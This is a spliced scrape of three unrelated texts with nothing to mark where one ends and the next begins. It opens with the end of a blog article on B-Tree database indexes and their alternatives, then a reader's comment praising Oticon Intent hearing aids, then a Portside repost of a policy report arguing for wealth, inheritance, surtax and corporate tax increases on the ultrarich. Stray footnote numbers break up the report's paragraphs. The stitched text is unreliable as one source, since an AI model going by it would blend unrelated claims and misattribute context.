// Output: “indexName”: “email_1”, “stage”: “IXSCAN”
B-Trees are not perfect. Here’s when they struggle:
Every insert may trigger splits all the way to the root. In the worst case:
Example:
Inserting 1 million keys with frequent splits:
Logical writes: 1 million
Physical writes (with splits): 2-3 million
Write amplification: 2-3x
Alternative:
LSM-Trees (Log-Structured Merge Trees) used by RocksDB, Cassandra, and LevelDB. LSM-Trees batch writes in memory and flush sequentially to disk, avoiding in-place updates.
B-Trees are optimized for range queries on the indexed key, but struggle with multi-column range queries.
Example:
-- Fast: Range query on indexed column
SELECT * FROM orders WHERE order_date BETWEEN ‘2024-01-01’ AND ‘2024-12-31’;
-- B-Tree traverses leaf nodes sequentially (leaf nodes are linked)
-- Slow: Range query on non-indexed column
SELECT * FROM orders WHERE total_amount BETWEEN 100 AND 200;
-- Must scan entire table (no index on total_amount)
-- Slow: Multi-column range query
CREATE INDEX idx_date_amount ON orders(order_date, total_amount);
SELECT * FROM orders WHERE order_date > ‘2024-01-01’ AND total_amount > 100;
-- B-Tree can use order_date range, but must filter total_amount in memory
Alternative:
Multi-dimensional indexes like R-Trees (for spatial data) or hybrid indexes.
To avoid disk I/O, databases cache frequently accessed B-Tree nodes in memory. For a large database:
1 billion records
Tree height: 4 levels
Internal nodes: ~1 million
Cache size: ~16 GB (to cache all internal nodes)
Rule of thumb:
Plan for 10-20% of your database size in RAM for B-Tree caches.
After many inserts and deletes, B-Tree nodes may be only 50-60% full. This wastes space and increases tree height.
Solution:
Periodic VACUUM (PostgreSQL) or OPTIMIZE TABLE (MySQL) to rebuild B-Trees.
Example:
-- PostgreSQL: Rebuild table and indexes
VACUUM FULL users;
-- MySQL: Optimize table (rebuilds B-Tree)
OPTIMIZE TABLE users;
B-Trees require locking during splits and merges. In high-concurrency workloads, lock contention can bottleneck writes.
Solution:
Latch-free B-Trees (used in modern databases like Microsoft SQL Server) or MVCC (Multi-Version Concurrency Control).
B-Trees are excellent for disk-based sorted data, but not always optimal:
If you’re doing 100,000 writes/sec with few reads, LSM-Trees outperform B-Trees.
Comparison:
Examples:
B-Tree: MySQL, PostgreSQL, SQLite
LSM-Tree: RocksDB, Cassandra, LevelDB
If your entire dataset fits in RAM, B-Trees add unnecessary complexity. Hash indexes or skip lists are simpler and faster.
Comparison:
Examples:
Hash index: Memcached, Redis hashes
Skip list: Redis sorted sets
For large analytical queries scanning millions of rows, columnar storage (e.g., Parquet, ORC) outperforms B-Trees.
Comparison:
Examples:
Row storage (B-Tree): MySQL, PostgreSQL
Columnar storage: Parquet (used by Snowflake, BigQuery), ORC (used by Hive)
After 50+ years, B-Trees remain the dominant on-disk data structure because they:
Minimize disk I/O:
High fanout reduces tree height
Balance automatically:
Splits and merges keep all leaves at the same depth
Support range queries:
Sorted keys and leaf-level links enable efficient scans
Work on any disk:
Optimized for both HDDs (sequential I/O) and SSDs (block-level access)
Key insight:
B-Trees match the constraints of disk storage. Since the smallest I/O unit is a block, B-Trees pack as much data as possible into each block. This simple idea—maximizing fanout to minimize height—makes databases fast.
When to use B-Trees:
Disk-based storage (database indexes)
Frequent reads and moderate writes
Range queries on sorted data
General-purpose OLTP workloads
When to consider alternatives:
Write-heavy workloads (LSM-Trees)
In-memory data (hash indexes, skip lists)
Analytical queries (columnar storage)
Every time you query your database and get a result in milliseconds, thank the B-Tree.
This article is based on Chapter 2 (”B-Tree Basics”) of
Database Internals: A Deep Dive into How Distributed Data Systems Work
by Alex Petrov (O’Reilly, 2019).
Additional resources:
Bayer, R., & McCreight, E. (1972). “Organization and Maintenance of Large Ordered Indexes.”
Acta Informatica
, 1(3), 173-189.
https://doi.org/10.1007/BF00288683
Petrov, A. (2019).
Database Internals: A Deep Dive into How Distributed Data Systems Work
. O’Reilly Media. ISBN: 978-1492040347
Knuth, D. E. (1998).
The Art of Computer Programming, Volume 3: Sorting and Searching (2nd Ed.)
. Addison-Wesley. ISBN: 978-0201896855
Graefe, G. (2011).
Modern B-Tree Techniques
. Now Publishers. ISBN: 978-1601984197
Thanks for reading!
If you found this deep-dive helpful, subscribe to
m3mo Bytes
for more technical explorations of databases, distributed systems, and data structures.
Have you worked with B-Trees or database indexes? What performance challenges have you faced? Share your experiences in the comments—I read and respond to every one.
What database systems have you worked with? (MySQL, PostgreSQL, MongoDB?)
Have you encountered B-Tree performance bottlenecks in production?
What index strategies have worked well for your workload?
Have you compared B-Trees to LSM-Trees for write-heavy workloads?
Any interesting query optimization stories with indexes?
I have worn hearing aids since childhood in the '90s. Moderate sloping to profound loss. Been through all the tech since the equalized analog era.
For a while now, like the last 15 to 20 years, since hearing aids went DSP, I had not been much impressed by each new generation. At the risk of sounding like a bit of an advertisement, that changed this year.
I have the new Oticon Intent. RIC style aid. They have some of the best spatial awareness I've experienced. They're capable of quite a lot of directionality - accelerometer and three microphones in each. I had to have the intensity of the directionality turned down a bit. It was startling me when I turned my head and I wasn't hearing things behind me enough. But that's at the expense of less signal due to more environmental noise.
The machine-learning based noise reduction is an improvement over the previous generations, too.
They have a music mode. It drops all the speech remapping and noise reduction and just makes it feel loud. It's some sort of perceptual algorithm: in my case as I turn up the volume it gets more and more treble, because only at the loudest volumes would I hear those high frequencies. All while being power limited at 95 dB SPL so I know I'm not blowing my ears. It's nice to not worry about if it's too loud.
Raising Taxes on the Ultrarich
Portside
portside.org
2025-11-24 02:22:55
Raising Taxes on the Ultrarich
Ira
Sun, 11/23/2025 - 21:22
...
The public has supported raising taxes on the ultrarich and corporations for years, but policymakers have not responded. Small increases in taxes on the rich that were instituted during times of Democratic control of Congress and the White House have been consistently swamped by larger tax cuts passed during times of Republican control. This was most recently reflected in the massive budget reconciliation bill pushed through Congress exclusively by Republicans and signed by President Trump. This bill extended the large tax cuts first passed by Trump in 2017 alongside huge new cuts in public spending. This one-step-forward, two-steps-back dynamic has led to large shortfalls of federal revenue relative to both existing and needed public spending.
Raising taxes on the ultrarich and corporations is necessary for both economic and political reasons. Economically, preserving and expanding needed social insurance and public investments will require more revenue. Politically, targeting the ultrarich and corporations as sources of the first tranche of this needed new revenue can restore faith in the broader public that policymakers can force the rich and powerful to make a fair contribution. Once the public has more faith in the overall fairness of the tax system, future debates about taxes can happen on much more constructive ground.
Policymakers should adopt the following measures:
Tax wealth (or the income derived from wealth) at rates closer to those applied to labor earnings. One way to do this is to impose a wealth tax on the top 0.1% of wealthy households.
Restore effective taxation of large wealth dynasties. One way to do this would be to convert the estate tax to a progressive inheritance tax.
Impose a high-income surtax on millionaires.
Raise the top marginal income tax rate back to pre-2017 levels.
Close tax loopholes for the ultrarich and corporations.
Introduction
The debate over taxation in the U.S. is in an unhealthy state. The public is deeply distrustful of policymakers and doesn’t believe that they will ever put typical families’ interests over those of the rich and powerful. In tax policy debates, this means that people are often highly skeptical of any proposed tax increases, even when they are told it will affect only (or, at least, overwhelmingly) the very rich. People are also so hungry to see
any
benefit at all, no matter how small, that they are often willing to allow huge tax cuts for the ultrarich in tax cut packages if those packages include any benefit to them as well. The result has been a continued downward ratchet of tax rates across the income distribution.
1
This is a terrible political dynamic for U.S. economic policy, given the pressing national needs for more revenue.
As countries get richer and older, the need for a larger public sector naturally grows.
2
Yet the share of national income collected in taxes by the U.S. government has stagnated since the late 1970s. This has left both revenue and public spending in the United States at levels far below those of advanced country peers.
3
This stifling of resources available for the public sector is not only inefficient but has led to frustration over its inability to perform basic functions. The political root of this suppression of resources for the public sector is a series of successful Republican pushes to lower tax rates for the richest households and corporations. This attempt to use tax policy to increase inequality has amplified other policy efforts that have increased inequality in pre-tax incomes, leading to suppressed growth in incomes and declining living standards for low- and middle-income households and a degraded public sector.
4
In recent decades the dominant strategy for many on the center–left to combat the public’s tax skepticism is to pair tax increases with spending increases for programs that lawmakers hope will be popular enough to justify the taxes. This strategy has worked in the sense that some tax increases have been passed in the same legislation that paid for valuable expansions of income support, social insurance, and public investment programs in recent years. But this strategy has not stopped the damaging political dynamic leading to the sustained downward ratchet of tax revenue and the tax rates granted to the ultrarich and corporations.
5
Part of the problem with a strategy of trying to attach tax increases to allegedly more popular spending increases is that it takes time for spending programs to
become
popular. The Affordable Care Act (ACA), for example, was not particularly popular in the year of its passage but has survived numerous efforts to dislodge it and has seemingly become more popular over time. Conversely, the expanded Child Tax Credit (CTC) that was in effect in 2021 and cut child poverty in half only lasted a single year, so there was little organic public pressure on Congress to ensure it continued.
In this report, we suggest another strategy for policymakers looking to build confidence in the broader public that tax policy can be made fairer: Target stand-alone tax increases unambiguously focused on ultrarich households and corporations as the first priority of fiscal policy. The revenue raised from this set of confidence-building measures can be explicitly aimed at closing the nation’s fiscal gap (the combination of tax increases or spending cuts needed to stabilize the ratio of public debt to national income).
6
Once this gap has been closed with
just
highly progressive taxes, the public debate about the taxes needed to support valuable public investments and welfare state expansions should be on much more fruitful ground.
This approach takes seriously the work of scholars like Williamson (2017), who argue that the U.S. public is not rigidly “anti-tax.” Indeed, this public often views taxpaying as a civic responsibility and moral virtue. Yet they have become convinced that too many of their fellow citizens are not making a fair and adequate contribution. Part of this perception rests on underestimating the taxes paid by the poor and working people, but a good part of this perception also rests on the accurate impression that many rich households and corporations are not paying their fair share. Policy can change this latter perception, particularly if the policy is explicitly identified with ensuring that the rich and corporations—and
only
the rich and corporations—will see their taxes increase.
The rest of this report describes a number of tax policy changes that would raise revenue from the rich and corporations with extremely small (often zero) spillover into higher taxes for anybody else. It also provides rough revenue estimates of how much each could raise. It is not exhaustive, but it demonstrates that the nation’s current fiscal gap could certainly be closed with only taxes on the very rich. Making this policy agenda and target explicit could go a long way to restoring trust and improving the quality of the debate about taxes.
Targeting the ultrarich
The vast majority (often 100%) of the tax policy changes discussed below would only affect the taxes paid by the top 1% or above (those making well over $563,000 in adjusted gross income in 2024). Many of the taxes—and the vast majority of the revenue raised—will actually come from households earning well above this amount. We will be more specific about the incidence of each tax in the detailed descriptions below. The tax policy changes fall into two categories: increasing the tax rates the rich and ultrarich pay and closing the tax loopholes they disproportionately benefit from. We first present the tax rate changes, and we list them in declining order of progressivity.
Both the rate changes and the loophole closers disproportionately focus on income derived from wealth. By far the biggest reason why rich households’ tax contributions are smaller than many Americans think is appropriate has to do with rich households’ source of income. So much of these households’ income derives from wealth, and the U.S. federal tax system taxes income derived from wealth more lightly than income derived from work. If policymakers are unwilling to raise taxes on income derived from wealth, the tax system can never be made as fair as it needs to be.
Levying a wealth tax on the top 0.1% or above of wealthy households
The WhyNot Initiative (WNI) on behalf of Tax the Greedy Billionaires (TGB) has proposed a wealth tax of 5% on wealth over $50 million, with rates rising smoothly until they hit 10% at $250 million in wealth and then plateauing. With this much wealth, even a household making just a 1% return on their wealth holdings would receive an income that would put them in the top 1% of the income distribution. A more realistic rate of return (say, closer to 7%) would have them in the top 0.1% of income.
The $50 million threshold roughly hits at the top 0.1% of net worth among U.S. families, so this tax is, by construction, extremely progressive—only those universally acknowledged as extremely wealthy would pay a penny in additional tax. The WNI proposal also imposes a steep exit tax, should anybody subject to the tax attempt to renounce their U.S. citizenship to avoid paying it.
The Tax Policy Center (TPC) has estimated that the WNI wealth tax could raise $6.8 trillion in additional net revenue over the next decade, an average of $680 billion annually. In their estimate, the TPC has accounted for evasion attempts and the “externality” of reduced taxes likely to be collected on income flows stemming from wealth holdings. Despite accounting for these considerations, the $6.8 trillion in revenue over the next decade could completely close the nation’s current estimated fiscal gap.
A key consideration in the long-run sustainability of revenue collected through a wealth tax is how quickly the tax itself leads to a decline in wealth for those above the thresholds of the tax. If, for example, the tax rate itself exceeded the gross rate of return to wealth, wealth stocks above the thresholds set by the tax would begin shrinking, and there would be less wealth to tax over time. The Tax Policy Center’s estimate includes a simulation of this decumulation process, assuming an 8.5% rate of return.
7
It finds only very slow rates of decumulation.
Other simulation results (like those in Saez and Zucman 2019b) find faster decumulation for wealth taxes as high as this, but even their findings would still support the significant revenue potential of a wealth tax targeted at sustainability. Whereas the WNI wealth tax raises roughly 2.2% of GDP over the next 10 years, the Saez and Zucman (2019a) results highlight that over half this much could essentially be raised in perpetuity.
8
It is important to note that even if revenue raised from any given wealth tax came in lower than expected due to the decumulation of wealth, this decumulation is itself highly socially desirable. The wealth would not be extinguished. It would instead accumulate to other households throughout society. An analogy is carbon taxes targeted at lowering greenhouse gas emissions. If a carbon tax were implemented and the revenue it raised steadily fell over time, this would be a sign of success, as the primary virtue of such a tax is not the long-run revenue it can raise but the behavioral changes it can spur, such as switching to less carbon-intensive forms of energy generation and use.
The benefits from wealth decumulation could be profound. For one, much of the rise in wealth in recent decades has been the result of a zero-sum transfer of income claims away from workers and toward capital owners (Greenwald, Lettau, and Ludvigson 2025). To the degree that higher wealth taxes make these zero-sum transfers less desirable for privileged economic actors, the imperative to keep wages suppressed and profits higher will be sapped, leading to a broader distribution of the gains of economic growth.
Further, highly concentrated wealth leads naturally to highly concentrated political power, eroding the ability of typical families to have their voices heard in important political debates (Page, Bartels, and Seawright 2013). Studies show that popular support for democratic forms of government is weaker in more unequal societies, demonstrating that a greater concentration of wealth can lead to the erosion of democracy (Rau and Stokes 2024).
Converting the estate tax to a progressive inheritance tax
The estate tax in the United States currently only applies to estates of more than $11.4 million. At the end of 2025 it would have reverted to pre-2017 levels of roughly $7 million, but the Republican budget reconciliation bill passed in 2025 will raise it to a level more than twice as high starting in 2026—at $15 million. The 40% estate tax rate applies on values above these thresholds.
The estate tax threshold has been increased significantly since 2000, with changes in 2001, 2012, 2017, and 2025 all providing large increases. In 2000 the threshold for exemption was under $1 million, and the rate was 55%. If the 2000 threshold were simply updated for inflation, it would have been $1.3 million today, instead of $11.4 million. At this $1.3 million threshold and with a 55% rate, the estate tax would raise roughly $75 billion more in revenue this year than it is currently projected to.
9
In short, our commitment to taxing wealthy estates and their heirs has eroded substantially in recent decades.
Batchelder (2020) proposes a new tax on inheritances that would replace the estate tax. Batchelder’s inheritance tax would not fall on the total value of the estate, but simply the portion of it inherited by individual heirs. Her proposal is to tax inheritances of various thresholds as ordinary income. Because the tax would be triggered by the lifetime level of gifts and inheritances, it cannot be avoided just by using estate planning to time these bequests and gifts. For a threshold of $1 million, the tax would raise roughly 0.35% of gross domestic product annually, or roughly $1 trillion over the next decade.
An inheritance tax is naturally more progressive than an estate tax. To see why, imagine an estate of $5 million that faced 2000-era estate tax rules. An estate tax would lower the value of the inheritance to all heirs by an amount proportional to the tax. Conversely, under an inheritance tax, the effective rate of the tax felt by heirs would be significantly different if the estate was spread among 10 heirs (each receiving $500,000 and, hence, not even being subject to the Batchelder inheritance tax that starts at $1 million) versus being spread among two heirs (each receiving $2.5 million and paying an inheritance tax). Fewer heirs for a given estate value imply a larger inheritance and, hence, a higher inheritance tax (if the inheritance exceeds the tax’s threshold).
Imposing a high-income surtax on millionaires
Probably the most straightforward way to tightly target a tax on a small slice of the richest taxpayers is to impose a high-income surtax. A surtax is simply an across-the-board levy on all types of income (ordinary income, business income, dividends, and capital gains) above a certain threshold. As such, there is zero possibility that lower-income taxpayers could inadvertently face any additional tax obligation because of it.
A version of such a high-income surtax was actually a key proposed financing source for early legislative versions of the Affordable Care Act. The bill that passed the House of Representatives included such a surtax.
10
This surtax was replaced with other revenue sources during the reconciliation process between the House and Senate versions.
One proposal is to enact a 10% surtax on incomes over $1 million. This would affect well under 1% of households (closer to 0.5%). Using data from the Statistics of Income (SOI) of the Internal Revenue Service (IRS), we find that roughly $1.55 trillion in adjusted gross income sat over this $1 million threshold among U.S. households in 2019.
11
A purely static estimate with no behavioral effects, hence, would argue that $155 billion annually (10% of this $1.55 trillion) could be raised from this surcharge. In tax scoring models (like that of the Tax Policy Center or the Joint Committee on Taxation), behavioral effects tend to reduce estimates roughly 25% below such static estimates. Applying such a discount would still suggest that the revenue potential of a high-income surtax with a $1 million threshold could be $1.5 trillion over the next decade.
Raising the top marginal income tax rate back to pre-TCJA levels
During the Clinton and Obama administrations, the top marginal tax rate on ordinary income was increased to 39.6%. During the George W. Bush and the first Donald Trump administrations, it was reduced and currently sits at 37%. This lower marginal top rate would have expired at the end of 2025, but the Republican budget reconciliation bill, passed by Congress and signed by Trump in July 2025, ensured that it would stay at 37%.
In 2025 the bracket that this top tax rate applies to will begin at $626,350 for single filers and joint filers. This is well under 1% of taxpayers. If the bracket for top tax rates was dropped to $400,000 and the rate was raised to 39.6%, the Tax Policy Center has estimated that this could raise roughly $360 billion over the next decade. Earlier in 2025, there were reports that Republicans in Congress were thinking about letting the top tax rate revert to the level it was at before the 2017 Tax Cuts and Jobs Act (TCJA). This was touted as members of Congress breaking with their party’s orthodoxy and actually taxing the rich. On the contrary, the new top marginal tax rate now applies to joint filers at an even
lower
level than pre-TCJA rates.
As can be seen in
Table 1
, pushing the top marginal rate on ordinary income to pre-TCJA levels is one of the weakest tools we have for raising revenue from the rich. The reason is simple. A large majority of the income of the rich is not ordinary income; it is income derived from capital and wealth, and, hence, only changing the tax rate on ordinary income leaves this dominant income form of the rich untouched.
Corporate tax rate increases
In 2017 the TCJA lowered the top rate in the corporate income tax from 35% to 21%, and the 2025 Republican budget reconciliation bill extended that lower 21% rate. The 35% statutory rate that existed pre-TCJA was far higher than the
effective
rate actually paid by corporations. Significant loopholes in the corporate tax code allowed even highly profitable companies to pay far less than the 35% statutory rate.
But at the same time the TCJA lowered the statutory rate, it did little to reduce loopholes—the gap between effective and statutory rates after the TCJA’s passage remains very large.
12
Clausing and Sarin (2023) have estimated that each 1 percentage point increase in the top statutory tax rate faced by corporations raises over $15 billion in the first years of the 10-year budget window. Raising today’s 21% top rate back to the 35% rate that prevailed before the TCJA would, hence, raise roughly $2.6 trillion over the next decade.
The immediate legal incidence of corporate taxes falls on corporations, the legal entities responsible for paying the taxes. However, the
economic
incidence is subject to more debate. The current majority opinion of tax policy experts and official scorekeepers like the Joint Tax Committee (JTC) is that owners of corporations (who skew toward the very wealthy) bear most of the burden of corporate tax changes.
13
But some small share of the corporate tax rate’s incidence is often assigned to workers’ wages, as there are some (speculative) reasons to think a higher corporate tax rate leads in the long run to lower wage income. The economic reasoning is that if the higher corporate tax rates lead to less economywide investment in tangible structures, equipment, and intellectual property, then this could slow economywide productivity growth. This slower productivity growth could, in turn, reduce wage growth for workers.
However, newer research highlights that there are good reasons to think that corporate tax rate increases have zero—or even positive—effects on private investment in structures, equipment, and intellectual property. Brun, Gonzalez, and Montecino (2025, forthcoming) argue that once one accounts for market power (either in product or labor markets) of corporations, corporate taxes fall, in part, on nonreproducible monopoly rents. To provide an example, a large share of Amazon’s profits is not just due to the size of the firm’s capital stock but its considerable monopoly power in many business segments. This market power allows them to charge higher prices than they could in competitive markets, and these excess prices represent a pure zero-sum transfer from consumers, not a normal return to investment.
Increasing taxes on these monopoly rents can reduce stock market valuations of firms and actually lower the hurdle rate for potential competitors assessing whether to make investments in productivity-enhancing capital. This can actually boost investment and productivity economywide, and if investment and productivity rise (or just do not fall) in response to corporate tax increases, this implies that none of the economic incidence of a corporate tax increase falls on anybody but the owners of corporations.
In short, despite some mild controversy, it seems very safe to assume that increases in the corporate income tax rate both are and would be perceived by the public as extremely progressive.
Closing tax loopholes that the ultrarich and corporations use
As noted above, it’s not just falling tax rates that have led to revenue stagnation in recent decades. There has also been an erosion of tax bases. Growing loopholes and increasingly aggressive tax evasion strategies have put more and more income out of the reach of revenue collectors. It goes almost without saying that the vast majority of revenue escaping through these loopholes and aggressive tax evasion strategies constitutes the income of the very rich and corporations.
These types of loopholes are unavailable to typical working families because their incomes are reported to the Internal Revenue Service. Typical working families rely on wage income, which is reported to the penny to the IRS, and families pay their legally obligated tax amount. Income forms earned by the ultrarich, however, often have very spotty IRS reporting requirements, and this aids in the evasion and reclassification of income flows to ensure the ultrarich are taxed at the lowest rates.
14
Shoring up tax bases by closing loopholes and engaging in more robust enforcement are key priorities for ensuring the very rich pay a fair and substantial contribution to the nation’s revenue needs.
Closing loopholes that allow wealth gains and transfers between generations to escape taxation
The wealthy use a number of strategies to escape taxation of the income they generate and to allow assets to be transferred to their heirs. Below we discuss three such strategies and provide a score for a consolidated package of reforms aimed at stopping this class of tax strategies—$340 billion over the next decade.
Ending the step-up in basis upon death or transfer of assets
This is best explained with an example. Say that somebody bought shares of a corporation’s stock in the early 1980s for $1 per share. They held onto it for decades until it reached $501 per share. Since they never realized this capital gain by selling the stock, they were never taxed on their growing wealth. Now, say that they transferred these stock holdings to their children decades later. Because it is no longer the original buyer’s property, it would not be assessed as part of an estate subject to the estate tax. If their children subsequently sold the stock, current law would allow a step-up in basis, which means the capital gain they earned from selling the stock would only be taxed on the gain over and above the $501 per share price that prevailed
when they received the stock
, not the original $1 per share price.
So, if children sold their stock gift for $501 per share, they would owe zero tax. And for the family as a whole, the entire (enormous) capital gain that occurred when the share appreciated from $1 to $501 is
never
taxed. This allows huge amounts of wealth to be passed down through families without the dynasty’s ever paying appropriate taxes, either capital gains taxes or estate taxes.
An obvious solution to this problem is simply to not grant the step-up in basis when the asset is transferred. That is, when the children receive the stock in the example above, any subsequent sale should be taxed on any capital gain calculated from the $1 originally paid for the stock. In the case above, the children would have had to pay a capital gains tax on the full value between $1 and $501 if they had sold the stock for $501.
Besides raising money directly through larger capital gains values, ending the step-up in basis can also cut down on many tax engineering strategies that wealthy families undertake to avoid taxation. Estimates for the revenue that could be raised by enacting this change are quite varied, but they tend to sit between $15 billion and $60 billion in 2025.
15
We estimate this would raise $190 billion over the next decade.
An alternative solution getting at the same problem would be to make the death of a wealth holder a realizable event. Essentially, for the purposes of taxation, it would be assumed that all assets were sold by a wealth holder upon their death, and the appropriate rate of capital gains taxation would then be collected.
Making borrowing a realizable event
A related reform would make the pledging of any asset as collateral against a loan a realizable event. In the example above, as the original holder of the stock held the shares and did not sell them over a long period of time, this raises an obvious question of how this family is financing their current consumption without liquidating any wealth. They could, of course, be earning labor income. But the very wealthy often finance current consumption by taking out loans and using the value of their wealth as collateral. So long as the interest rates on the loans are lower than the rate of return on the wealth being pledged as collateral, they can enjoy high and rising consumption and still see considerable wealth appreciation. This is a particularly useful strategy during periods of low interest rates (like most of the past 25 years) and for owners of newer corporations that are growing rapidly (think Jeff Bezos and Amazon during the 2000s). This use of debt as a strategy of avoiding capital gains realization has often been called the “Buy, Borrow, Die” strategy.
An obvious reform to stop this would be to force wealth holders to treat pledging an asset as collateral as a realization event for this asset. When the wealth holder goes to financiers to get loans and pledges their shares as collateral, the wealth holder would pay a capital gains tax on the difference in the value of the stock between when they originally bought it and the value the day it is pledged for collateral. The amount of revenue this would raise would be small in the grand scheme of the federal budget, roughly $60 billion over the next decade. But it would provide one more block to a common tax evasion strategy for the ultrarich, and this could show up in more revenue collected through other taxes.
Closing loopholes that erode estate or inheritance tax bases
Hemel and Lord (2021) identify estate planning mechanisms that reduce the base of the current estates taxes, including the abuse of grantor retained annuity trusts (GRATs) and excessively preferential tax treatment of transfers within family-controlled entities. Under current law, wealthy individuals establishing a trust for their descendants may calculate the taxable gift amount of the trust by subtracting the value of any qualified interest. This qualified interest includes any term annuity retained by the grantor of the trust. The annuity is based on market interest rates prevailing when the trust was established. When interest rates are low, this becomes an extremely valuable deduction.
Hemel and Lord (2021) give the example of a grantor establishing a $100 billion trust but retaining a two-year annuity payment of $50.9 million based on the 1.2% interest rate prevailing in 2021. This taxpayer would be able to subtract this annuity from their taxable gift calculation, effectively paying no gift tax. If the assets in the trust grew faster than 1.2%, then the trust would have assets left over after two years, and these could be passed to the beneficiaries free of any transfer tax (as these assets came from the trust, not the original grantor). If assets in the trust grew more slowly than this amount, then the trust would be unable to make its full final annuity payment and would be declared a failed trust and would trigger no estate or gift tax consequences. In this case, the original grantor could simply try again to construct a short-term irrevocable trust that would succeed in transferring income to heirs without triggering a gift tax.
Hemel and Lord (2021) recommend repealing the law that allows for this deduction of qualified interest from gift or transfer taxes applying to GRATs. They also argue for reducing the preferential treatment of transfers within family-controlled entities. The full package of reforms to estate planning that they recommend would raise $90 billion over the next decade.
Closing the loophole from ambiguity between self-employment and net investment income
As part of the Affordable Care Act, a 3.8% tax was assessed on income above $200,000 (for single filers and $250,000 for joint filers). If this income is earned as wages or self-employment income, this tax is paid through the Federal Insurance Contributions Act (FICA) or the Self-Employment Contributions Act (SECA) taxes. If the income is received as a dividend or interest payment or royalty or other form of investment income, the tax is paid as a Net Investment Income Tax (NIIT). The clear intent is for income of all forms to be assessed this tax.
Somehow, however, some business owners (mostly those owning limited partnerships and S corporations—corporations with a limited number of shareholders who are required to pass through all profits immediately to owners) have managed to classify their income as not subject to FICA, SECA, or the NIIT.
16
A number of policy options could close this unintended gap and raise nontrivial amounts of revenue—roughly $25 billion in 2025. Importantly, the revenue collected by this loophole closing would go directly to the Medicare trust fund.
International corporate tax reform
Before the TCJA, the biggest loophole by far in the corporate income tax code was U.S. corporations’ ability to defer taxes paid on profits earned outside the United States. In theory, once these profits were repatriated, taxes would be levied on them. However, financial engineering meant that there was little need to repatriate these profits for reasons of undertaking investment or stock buybacks or anything else corporations wanted to do.
17
Further, corporations routinely lobbied for repatriation holidays, periods of time when they were allowed to repatriate profits at a reduced rate. One such holiday was passed by Congress and signed into law by George W. Bush in 2004.
Between 2004 and 2017, pressure for another such holiday ramped up as more and more firms deferred corporate taxes by holding profits offshore. The TCJA not only provided such a holiday for past profits kept offshore, it also made profits booked overseas mostly exempt from U.S. corporate taxes going forward. In essence, the TCJA turned deferral into an exemption.
This TCJA exemption of foreign-booked profits was subject to small bits of tax base protection. But they have been largely ineffective. The 2025 budget reconciliation bill would further exacerbate these problems, reducing taxes on foreign income even more.
Clausing and Sarin (2023) recommend a suite of corporate reforms that aims to level the playing field between firms booking profits in the United States versus overseas. Key among them would be to reform the Global Intangible Low-Taxed Income (GILTI) tax rate, a rate introduced in the TCJA, to ensure that financial engineering would not allow large amounts of corporate income earned by U.S.-based multinationals to appear as if they were earned in tax havens.
18
The GILTI is essentially a global minimum tax rate for U.S. multinationals. But the rate (10.5% in 2024 and 12.6% in 2025) is far too low to effectively stop this kind of tax haven-shopping for corporations, much lower than the 15% minimum rate negotiated by the OECD and agreed to by the Biden administration in 2022.
In addition, multinationals are currently allowed to blend all their foreign tax obligations globally and take credits for foreign corporate income taxes paid. So, taxes paid on a company’s actual manufacturing plant in, say, Canada, can count toward the GILTI contribution of a multinational, even if they then used financial engineering to shift most of their paper profits to tax havens like the Cayman Islands.
Raising the GILTI rate and applying it on a country-by-country basis would go a long way to preserving the base of the U.S. corporate income tax in the face of tax havens. The Clausing and Sarin (2023) suite of reforms would raise $42 billion in 2025.
Building up IRS enforcement capabilities and mandates
In 2022, the IRS estimated that the tax gap (the dollar value of taxes legally owed but not paid in that year) exceeded $600 billion. The richest households account for the large majority of this gap. The IRS in recent decades has lacked both the resources and the political support to properly enforce the nation’s tax laws and collect the revenue the richest households owe the country.
Due to this lack of resources and mandates, the IRS instead often took the perverse approach of leveraging enforcement against easy cases—easy both in terms of not taking much capacity and of not generating intense congressional backlash.
19
In practice, this meant intensively auditing recipients of refundable tax credits to look for improper payments. Tax credits are refundable when the amount of a credit (say, the Child Tax Credit) is larger than the taxpayer’s entire income tax liability. In this case, the credit does not just reduce income tax liability; it will also result in an outright payment (hence, refundable) to the taxpayer claiming it. Recipients of these refundable tax credits are,
by definition,
low-income taxpayers—those with low income tax liability. Besides making the lives of these low-income households more anxious, these audits also just failed to generate much revenue—again, because the group being audited was generally low income and didn’t owe significant taxes in the first place.
The Biden administration included significant new money to boost IRS enforcement capacity as part of the 2022 Inflation Reduction Act (IRA). This extra enforcement capacity was paired with new mandates to reduce the tax gap by increasing enforcement efforts on rich taxpayers.
However, the IRA additions to IRS resources were already being chiseled away before the 2024 presidential election. The Trump administration clearly has no interest in whether or not the IRS consistently enforces revenue collection from the rich. The budget reconciliation bill that Republicans passed through Congress in July rolled back the expanded funding for IRS enforcement. Trump’s proposed fiscal year 2026 budget for IRS funding would chip away at that even further.
The IRS has also not been immune to the Trump administration’s attempt to make life miserable for federal employees. The agency has lost a quarter of its workforce since 2025 to layoffs, the deferred resignation offer pushed by Elon Musk’s so-called Department of Government Efficiency, early retirements, and other separations (TIGTA 2025).
The sharp turn away from the Biden administration’s support of the IRS represents a missed opportunity. While it would be near impossible to fully close the tax gap, Sarin and Summers (2019) estimate that some modest and doable steps could reliably collect significantly over $100 billion per year over the next decade from increased enforcement efforts.
How much could a campaign of confidence-building measures to tax the ultrarich raise?
These measures to enact a series of tax reforms laser-targeted at only the rich could raise significant revenue. One obvious benchmark suggests itself: the current fiscal gap. The fiscal gap is how much (as a share of GDP) taxes would need to be raised or spending would need to be cut to stabilize the ratio of public debt to GDP. Today this gap stands at roughly 2.2%.
Table 1 gives a rough score for each of the provisions mentioned above. It then conservatively estimates the combined revenue-raising potential of this package. It assumes that the whole policy package is equal to 70% of the sum of its parts. This would help account for some fiscal “externalities” (i.e., taxing wealth means wealth grows more slowly over time and, hence, reduces tax collections on income earned from wealth going forward). It also would help account for some potentially duplicative effects that could reduce some revenue collected by the combination of these reforms. For example, if the step-up in basis were eliminated, the incentive for rich households to finance consumption with loans would be reduced, so the revenue generated by treating the pledging of collateral as a realizable event would likely be reduced.
This combination of confidence-building measures to tax the rich would unambiguously be able to close the nation’s current fiscal gap. The sum of the parts of this agenda would raise roughly 4% of GDP over the long run, and even if the sharp 30% discount on the sum of these parts was applied, it is still just under 3% of GDP. Telling the American public that this package of tax increases on the ultrarich had put the nation on a fully sustainable long-run trajectory while still leaving enough money to fund something as large as universal pre-K for 3- and 4-year-olds or a radical increase in more generous coverage in the nation’s unemployment insurance system could be seismic for changing the tax debate in the United States.
